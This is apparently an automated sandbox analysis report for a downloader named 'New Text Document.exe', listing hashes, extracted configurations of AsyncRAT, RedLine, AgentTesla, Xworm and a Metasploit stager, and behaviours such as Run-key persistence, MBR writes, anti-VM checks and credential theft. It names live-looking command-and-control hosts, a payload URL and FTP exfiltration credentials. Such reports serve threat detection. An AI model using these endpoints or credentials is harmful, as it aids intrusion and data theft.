Overview
overview
10Static
static
3New Text Document.exe
windows10-1703-x64
10New Text Document.exe
windows7-x64
1New Text Document.exe
windows10-2004-x64
10New Text Document.exe
windows11-21h2-x64
10New Text Document.exe
android-10-x64
New Text Document.exe
android-11-x64
New Text Document.exe
android-13-x64
New Text Document.exe
android-9-x86
New Text Document.exe
macos-10.15-amd64
1New Text Document.exe
debian-12-armhf
New Text Document.exe
debian-12-mipsel
New Text Document.exe
debian-9-armhf
New Text Document.exe
debian-9-mips
New Text Document.exe
debian-9-mipsel
New Text Document.exe
ubuntu-18.04-amd64
New Text Document.exe
ubuntu-20.04-amd64
New Text Document.exe
ubuntu-22.04-amd64
New Text Document.exe
ubuntu-24.04-amd64
Analysis
-
max time kernel
281s -
max time network
1801s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 17:22
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
New Text Document.exe
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
New Text Document.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
New Text Document.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
New Text Document.exe
Resource
android-x64-20240514-en
Behavioral task
behavioral6
Sample
New Text Document.exe
Resource
android-x64-arm64-20240514-en
Behavioral task
behavioral7
Sample
New Text Document.exe
Resource
android-33-x64-arm64-20240514-en
Behavioral task
behavioral8
Sample
New Text Document.exe
Resource
android-x86-arm-20240514-en
Behavioral task
behavioral9
Sample
New Text Document.exe
Resource
macos-20240410-en
Behavioral task
behavioral10
Sample
New Text Document.exe
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral11
Sample
New Text Document.exe
Resource
debian12-mipsel-20240418-en
Behavioral task
behavioral12
Sample
New Text Document.exe
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral13
Sample
New Text Document.exe
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral14
Sample
New Text Document.exe
Resource
debian9-mipsel-20240418-en
Behavioral task
behavioral15
Sample
New Text Document.exe
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral16
Sample
New Text Document.exe
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral17
Sample
New Text Document.exe
Resource
ubuntu2204-amd64-20240522.1-en
Behavioral task
behavioral18
Sample
New Text Document.exe
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
Protocol: ftp- Host:
ftp.midhcodistribuciones.com - Port:
21 - Username:
[email protected] - Password:
,A7}+JV4KExQ
Extracted
asyncrat
| Edit 3LOSH RAT
Exodus_Market
leetboy.dynuddns.net:1339
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
svchos.exe
-
install_folder
%AppData%
Extracted
asyncrat
| Edit 3LOSH RAT
LNKK
leetboy.dynuddns.net:1338
AsyncMutex_6h2caasdas2133sOkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
risepro
118.194.235.187:50500
Extracted
asyncrat
| Edit 3LOSH RAT
Load_Man
leetman.dynuddns.com:1337
AsyncMutex_6SI8asdasd2casOkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.midhcodistribuciones.com - Port:
21 - Username:
[email protected] - Password:
,A7}+JV4KExQ
Extracted
metasploit
metasploit_stager
129.159.151.146:3344
Extracted
xworm
5.0
45.141.26.119:1996
45.141.27.41:7000
85.203.4.146:7000
wHK5NlknpAL3Lk1X
-
Install_directory
%AppData%
-
install_file
csrss.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\csrss.exe family_xworm C:\Users\Admin\XClient.exe family_xworm behavioral3/memory/6364-859-0x0000000000CB0000-0x0000000000CC0000-memory.dmp family_xworm behavioral3/memory/1280-861-0x0000000000FD0000-0x0000000000FE0000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\a\svchost.exe family_xworm behavioral3/memory/6956-1137-0x0000000000C10000-0x0000000000C20000-memory.dmp family_xworm -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies firewall policy service 2 TTPs 2 IoCs
Processes:
AppGate2103v15.exenO20MXBUGloxh9agdli788Vc.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" AppGate2103v15.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" nO20MXBUGloxh9agdli788Vc.exe -
Phorphiex payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe family_phorphiex C:\Windows\syslmgrsvc.exe family_phorphiex -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/2284-217-0x0000000000400000-0x0000000000452000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
Fighting.pifdescription pid process target process PID 4584 created 3436 4584 Fighting.pif Explorer.EXE PID 4584 created 3436 4584 Fighting.pif Explorer.EXE -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\print.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\a\print.exe xmrig -
Async RAT payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\start.exe family_asyncrat C:\Users\Admin\AppData\Local\Temp\a\regasms.exe family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
AppGate2103v15.exeoiktbrfhNygCPSFVdJ1Rkgku.exenO20MXBUGloxh9agdli788Vc.exeAppGate2103v01.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AppGate2103v15.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oiktbrfhNygCPSFVdJ1Rkgku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nO20MXBUGloxh9agdli788Vc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AppGate2103v01.exe -
Blocklisted process makes network request 2 IoCs
Processes:
oaNMFMP.exeflow pid process 748 6388 oaNMFMP.exe 754 6388 oaNMFMP.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4268 powershell.exe 4540 powershell.exe 6940 powershell.exe 6524 powershell.exe 2420 powershell.exe 6180 powershell.exe 4028 powershell.exe 6864 powershell.exe 4576 powershell.exe 6956 powershell.EXE 4592 powershell.exe 1216 powershell.exe 6064 powershell.exe 368 powershell.exe 5928 powershell.exe 5164 powershell.exe 6828 powershell.exe 6764 powershell.exe 3132 powershell.exe 6760 powershell.exe 5248 powershell.exe 5940 powershell.exe 4112 powershell.exe 2340 powershell.exe -
Contacts a large (650) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
GoogleUpdateTaskMachineQCW.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts GoogleUpdateTaskMachineQCW.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1696 takeown.exe 6348 icacls.exe -
Checks BIOS information in registry 2 TTPs 11 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
AppGate2103v15.exeoiktbrfhNygCPSFVdJ1Rkgku.exeAppGate2103v01.exeInstall.exerundll32.exenO20MXBUGloxh9agdli788Vc.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AppGate2103v15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oiktbrfhNygCPSFVdJ1Rkgku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AppGate2103v01.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AppGate2103v15.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oiktbrfhNygCPSFVdJ1Rkgku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nO20MXBUGloxh9agdli788Vc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nO20MXBUGloxh9agdli788Vc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AppGate2103v01.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
DlRIpsJ.exeMartDrum.exeoiii.exeBypass3_Pure_Mode.exeoaNMFMP.exeNew Text Document.exestart.execsrss.exeSetup.execonhost.exeInstall.exeXClient.exerem.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation DlRIpsJ.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation MartDrum.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation oiii.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Bypass3_Pure_Mode.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation oaNMFMP.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation New Text Document.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation start.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation csrss.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation conhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation rem.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 16 IoCs
Processes:
cmd.exemsbuild.exemsbuild.execsrss.exesvchost.exeXClient.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HcOGmFZ1RLXW4uIIpLU2hLPd.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yNCJ6waxU0YxbzWd4YMDtOO8.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk csrss.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5YloKvOAHb0FXPe0yqvNHpfL.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5TqBLh6Dojf6Um8NwJfDgOka.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jDuVUAip2Z7hUWIX59tHw5Go.bat msbuild.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk csrss.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoseidonSense.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rxvin71EaiQPSRy817RU6TR6.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XdpYmPDCVt9rCyMVdgv77Mog.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EJjXWT0H70MtM063Q0T95cZR.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iC70tSpUgxde3BIQj9kO628h.bat msbuild.exe -
Executes dropped EXE 64 IoCs
Processes:
MartDrum.exe4.exestart.exerem.exesvcs.exerooma.exeFighting.pifregasms.exeZinck2.exeZinckeds.exesvchos.exejsc.exego.execrypted.exeaaaaaaaa.exeAppGate2103v15.exeserver.exewxijgyp.exetime2time.exean4IhMEUJGaXcuvcgGd8PX9U.exefile300un.exeAIrj5QVEYuGuBGBtXUl948x8.exedheliGO8vZJZX17tAGdW1JAq.exeoiktbrfhNygCPSFVdJ1Rkgku.exei4NmxEpmuAkauKUZZPpG91uN.exeInstall.exezwuivg.exenO20MXBUGloxh9agdli788Vc.exeeZLzlDEi6dGI8UUD1hmA2jyZ.exeInstall.exeAppGate2103v01.exertx.exertx.exeexample.exewin-test.exebackdoor.exeInstall.exeasdf.exewsiopohwqsd.exeQEwecfyhj.exeBypass3_Pure_Mode.exeexample.execsrss.exeXClient.exeInstall.exeSrbijaSetupHokej.exeSrbijaSetupHokej.tmpGoogleUpdateTaskMachineQCW.exegywervcyuj.exengown.exegHIvTf22qvmZjum.exeupdater.exeSetup.exesvchost.execrt.execrt.tmpsubmoremediaplayer32.exesubmoremediaplayer32.exeDlRIpsJ.exeoiii.exeoaNMFMP.exegHIvTf22qvmZjum.exewmpnetwk.exewmixedwk.exepid process 2508 MartDrum.exe 3052 4.exe 4436 start.exe 3524 rem.exe 5028 svcs.exe 3356 rooma.exe 4584 Fighting.pif 4772 regasms.exe 2676 Zinck2.exe 4948 Zinckeds.exe 4216 svchos.exe 5372 jsc.exe 4052 go.exe 5920 crypted.exe 2348 aaaaaaaa.exe 3164 AppGate2103v15.exe 6752 server.exe 2464 wxijgyp.exe 4108 time2time.exe 5792 an4IhMEUJGaXcuvcgGd8PX9U.exe 4240 file300un.exe 6428 AIrj5QVEYuGuBGBtXUl948x8.exe 3664 dheliGO8vZJZX17tAGdW1JAq.exe 6704 oiktbrfhNygCPSFVdJ1Rkgku.exe 6832 i4NmxEpmuAkauKUZZPpG91uN.exe 6824 Install.exe 5680 zwuivg.exe 4480 nO20MXBUGloxh9agdli788Vc.exe 3340 eZLzlDEi6dGI8UUD1hmA2jyZ.exe 1928 Install.exe 5976 AppGate2103v01.exe 6580 rtx.exe 7056 rtx.exe 7100 example.exe 7136 win-test.exe 1052 backdoor.exe 4840 Install.exe 2148 asdf.exe 6360 wsiopohwqsd.exe 6116 QEwecfyhj.exe 3044 Bypass3_Pure_Mode.exe 5400 example.exe 6364 csrss.exe 1280 XClient.exe 5512 Install.exe 2060 SrbijaSetupHokej.exe 2824 SrbijaSetupHokej.tmp 5836 GoogleUpdateTaskMachineQCW.exe 5672 gywervcyuj.exe 5984 ngown.exe 1016 gHIvTf22qvmZjum.exe 5052 updater.exe 2188 Setup.exe 6956 svchost.exe 4212 crt.exe 7064 crt.tmp 6924 submoremediaplayer32.exe 4108 submoremediaplayer32.exe 6040 DlRIpsJ.exe 7128 oiii.exe 6388 oaNMFMP.exe 6760 gHIvTf22qvmZjum.exe 4988 wmpnetwk.exe 6284 wmixedwk.exe -
Loads dropped DLL 8 IoCs
Processes:
an4IhMEUJGaXcuvcgGd8PX9U.execrt.tmprundll32.exewmpnetwk.exewmixedwk.exe7z.exe7z.exe7z.exepid process 5792 an4IhMEUJGaXcuvcgGd8PX9U.exe 7064 crt.tmp 6896 rundll32.exe 4988 wmpnetwk.exe 6284 wmixedwk.exe 6436 7z.exe 2260 7z.exe 6748 7z.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1696 takeown.exe 6348 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe themida behavioral3/memory/3164-267-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/3164-270-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/3164-271-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/3164-268-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/3164-269-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/3164-287-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-479-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-497-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-495-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-494-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-496-0x0000000140000000-0x0000000140DF9000-memory.dmp themida behavioral3/memory/6704-509-0x0000000140000000-0x0000000140DF9000-memory.dmp themida C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe themida behavioral3/memory/4480-572-0x0000000140000000-0x0000000140C37000-memory.dmp themida behavioral3/memory/5976-638-0x0000000140000000-0x0000000140C37000-memory.dmp themida behavioral3/memory/5976-651-0x0000000140000000-0x0000000140C37000-memory.dmp themida behavioral3/memory/4480-1055-0x0000000140000000-0x0000000140C37000-memory.dmp themida -
Processes:
resource yara_rule behavioral3/memory/7056-656-0x0000000000400000-0x0000000000848000-memory.dmp upx behavioral3/memory/7056-1089-0x0000000000400000-0x0000000000848000-memory.dmp upx -
Unexpected DNS network traffic destination 23 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 54.76.137.194 Destination IP 52.209.50.186 Destination IP 54.194.139.231 Destination IP 54.194.203.69 Destination IP 54.76.137.194 Destination IP 91.211.247.248 Destination IP 54.194.203.69 Destination IP 54.194.203.69 Destination IP 54.194.203.69 Destination IP 54.76.137.169 Destination IP 54.194.203.69 Destination IP 91.211.247.248 Destination IP 54.194.203.69 Destination IP 54.194.203.69 Destination IP 54.76.137.194 Destination IP 54.194.213.132 Destination IP 54.76.137.194 Destination IP 54.194.203.69 Destination IP 52.209.50.186 Destination IP 54.76.137.169 Destination IP 54.194.203.69 Destination IP 54.76.137.169 Destination IP 54.76.137.169 -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\server.exe vmprotect behavioral3/memory/6752-298-0x00007FF7B6A40000-0x00007FF7B7319000-memory.dmp vmprotect -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
svcs.exertx.exerem.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" svcs.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" rtx.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" rem.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" rem.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\microsofts\\svcs.exe\"" svcs.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
AppGate2103v15.exeoiktbrfhNygCPSFVdJ1Rkgku.exenO20MXBUGloxh9agdli788Vc.exeAppGate2103v01.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AppGate2103v15.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oiktbrfhNygCPSFVdJ1Rkgku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nO20MXBUGloxh9agdli788Vc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AppGate2103v01.exe -
Drops Chrome extension 3 IoCs
Processes:
DlRIpsJ.exeoaNMFMP.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json DlRIpsJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json oaNMFMP.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json DlRIpsJ.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
DlRIpsJ.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini DlRIpsJ.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
server.exedescription ioc process File opened (read-only) \??\G: server.exe File opened (read-only) \??\L: server.exe File opened (read-only) \??\Q: server.exe File opened (read-only) \??\E: server.exe File opened (read-only) \??\H: server.exe File opened (read-only) \??\K: server.exe File opened (read-only) \??\P: server.exe File opened (read-only) \??\V: server.exe File opened (read-only) \??\I: server.exe File opened (read-only) \??\N: server.exe File opened (read-only) \??\O: server.exe File opened (read-only) \??\X: server.exe File opened (read-only) \??\Y: server.exe File opened (read-only) \??\B: server.exe File opened (read-only) \??\J: server.exe File opened (read-only) \??\M: server.exe File opened (read-only) \??\R: server.exe File opened (read-only) \??\S: server.exe File opened (read-only) \??\T: server.exe File opened (read-only) \??\U: server.exe File opened (read-only) \??\W: server.exe File opened (read-only) \??\Z: server.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs
Processes:
flow ioc 831 pastebin.com 833 pastebin.com 1734 pastebin.com 2450 pastebin.com 2452 pastebin.com 55 raw.githubusercontent.com 476 pastebin.com 514 pastebin.com 1772 pastebin.com 2045 pastebin.com 2889 pastebin.com 1240 pastebin.com 1241 pastebin.com 1733 pastebin.com 2046 pastebin.com 2054 pastebin.com 2887 pastebin.com 54 raw.githubusercontent.com 349 pastebin.com 1296 pastebin.com 2465 pastebin.com 2901 pastebin.com -
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 402 api.myip.com 406 ipinfo.io 407 ipinfo.io 558 api.myip.com 562 ipinfo.io 681 ip-api.com 405 api.myip.com 473 ip-api.com 559 api.myip.com 561 ipinfo.io 615 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
an4IhMEUJGaXcuvcgGd8PX9U.exedescription ioc process File opened for modification \??\PhysicalDrive0 an4IhMEUJGaXcuvcgGd8PX9U.exe -
AutoIT Executable 7 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\a\go.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\gywervcyuj.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\a\ngown.exe autoit_exe -
Drops file in System32 directory 47 IoCs
Processes:
AppGate2103v15.exeDlRIpsJ.exeoaNMFMP.exepowershell.exeInstall.exesvchost.exenO20MXBUGloxh9agdli788Vc.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI AppGate2103v15.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DlRIpsJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol oaNMFMP.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini AppGate2103v15.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft DlRIpsJ.exe File opened for modification C:\Windows\System32\GroupPolicy AppGate2103v15.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA DlRIpsJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 DlRIpsJ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DlRIpsJ.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\1308.hecate svchost.exe File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\info svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini nO20MXBUGloxh9agdli788Vc.exe 